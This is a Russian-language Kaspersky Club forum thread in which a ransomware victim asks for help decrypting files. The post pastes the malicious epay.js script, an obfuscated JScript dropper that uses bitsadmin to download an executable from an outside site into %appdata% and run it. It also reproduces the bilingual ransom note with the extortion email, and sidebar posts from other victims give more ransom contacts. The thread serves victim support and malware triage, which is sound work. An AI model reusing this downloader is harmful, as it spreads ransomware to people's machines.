Перейти к содержанию
Задай вопрос Павлу Вострикову, эксперту по Kaspersky Security Center
20 лет клубу! Куда отправится Kaspersky Club? Нажми, чтобы узнать локацию! ;)

Вирус зашифровал все файлы.

Rumpelstiltskin
 Поделиться

Рекомендуемые сообщения

Rumpelstiltskin

Rumpelstiltskin

Опубликовано
Опубликовано
Вирусный файл epay.js зашифровал все файлы, вот содержимое:
var lildz = new ActiveXObject("shell.application"); 
var am = String.fromCharCode( 99,109,100,46,101) 
var kk = " h^ttp://selfpaymarket.com/1110.exe %appdata%\kes.exe     &start %appdata%\kes.exe" 
lildz.ShellExecute (am+"xe"," /c bitsadmin   /tran^sfer my^job /do^wnload /prio^rity hi^gh"+kk, '', 'open',0);
 
README1.txt
Bаши файлы былu зашифpовaны.
Чmобы pacшифрoваmь ux, Вaм нeобxoдuмо отnравumь kод:
EF632BE58468CCDF21F4|0
нa электрoнный адpеc robertamacdonald1994@gmail.com .
Далee вы пoлучитe вcе неoбxодuмые uнстрyкциu.
Попыmки раcшuфpоваmь сaмостoяmельнo нe приведуm нu k чему, kpомe бeзвoзврaтнoй nomерu uнфopмациu.
Если вы всё жe хomите nonыmатьcя, mо npeдваpитeльно cделайте pезеpвные коnии файлoв, иначе в cлучае
ux изменения раcшuфpoвka станеm нeвозмoжной нu npu кaких уcлoвuяx.
Eслu вы не полyчилu oтвemа пo вышeуkaзаннoму aдpeсy в meчeниe 48 чaсoв (и тoлько в эmом случae!),
вocnoльзyйmеcь формой обpаmной связи. Это мoжно cделamь двумя cnocобамu:
1) Скачaйme и уcmановumе Tor Browser пo ссылке: https://www.torproject.org/download/download-easy.html.en
В адpecнoй стpоkе Tor Browser-а ввeдume адpес:
и нaжмuте Enter. 3аrрyзиmcя стpaницa с фopмой oбpaтнoй связи.
2) B любом бpаузepe nepeйдuтe no oднoму uз aдрecoв:
 
 
All the important files on your computer were encrypted.
To decrypt the files you should send the following code:
EF632BE58468CCDF21F4|0
to e-mail address robertamacdonald1994@gmail.com .
Then you will receive all necessary instructions.
All the attempts of decryption by yourself will result only in irrevocable loss of your data.
If you still want to try to decrypt them by yourself please make a backup at first because
the decryption will become impossible in case of any changes inside the files.
If you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),
use the feedback form. You can do it by two ways:
1) Download Tor Browser from here:
Install it and type the following address into the address bar:
Press Enter and then the page with feedback form will be loaded.
2) Go to the one of the following addresses in any browser:

 

Addition.txt

FRST.txt

Shortcut.txt

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Danil^_^
      Зашифрованы все файлы
      Автор Danil^_^
      Компьютер был заражен вирусом шифровальщиком, зараженные (зашифрованные) файлы имеют расширение "XTBL" (.xtbl)., Прошу помощи в расшифровки данных файлов.

       

      CollectionLog-2015.02.28-22.30.zip
    • Алесандр2601
      Ваши файлы были зашифрованы.
      Автор Алесандр2601
      Ваши файлы были зашифрованы.
      Чтобы расшифровать их, Вам необходимо отправить код:
      E143EC7813EAAD3CC41B|0
      на электронный адрес decoder1112@gmail.com или deshifrovka@india.com .
      помоите вылечить
       
      avz_log.txt
    • sizev
      зашифрованны файлы xtbl и ytbl
      Автор sizev
      Добрый день
      Поймали на работе вирус, зашифровал файлы Майкрософта, на каждом диске создал файлы readme.txt c номерами 1-10
      запустили антивирусник, вроде вирус поймал. но все зашифрованно.
       
      README1.txt
      CollectionLog-2015.03.02-10.58.zip
    • Алексей Коробов
      Файлы зашифрованы
      Автор Алексей Коробов
      Здравствуйте, прошу помочь в решении проблемы.

       

      На рабочем столе вместо фонового рисунка на чёрном фоне красными буквами: Внимание !все важные файлы на всех дисках компьютера зашифрованы, Подробности вы можете прочитать в файлах readme.txt которые можно найти на из дисков (скрин прилагается)

      А все файлы зашифровались с расширением.xtbl,

       

      похожие ситуации у Вас уже были. Прошу помочь и мне.

    • Postalrex
      Ваши файлы были зашифрованы
      Автор Postalrex
      Здравствуйте. После занятий по истории и 1,5 часов игр  включив компьютер увидел чёрный экран с надписью: Внимание! Все важные файлы на дисках вашего компьютера были зашифрованы. Подробности вы можете прочитать в файлах README.txt которые можно найти на любом из дисков. Файл README.txt: Ваши файлы были зашифрованы. чтобы расшифровать их, вам необходимо отправить код 90B116047E559CE8CA4 | 0 на электронный адрес decoder1112@gmail/com или deshifrovka@gmail.com далее вы получите все необходимые инструкции. попытка расшифровать самостоятельно не приведут ни к чему кроме безвозвратной потери информации. Далее тоже самое только на английском языке.
       
      Смиренно прошу помощи. И пожалуйста, если возможно, можно объяснить ход действий попроще, для ,,чайников,, коим я собственно в области компьютеров и являюсь. Благодарю.
      CollectionLog-2015.02.28-12.18.zip
×
×
  • Создать...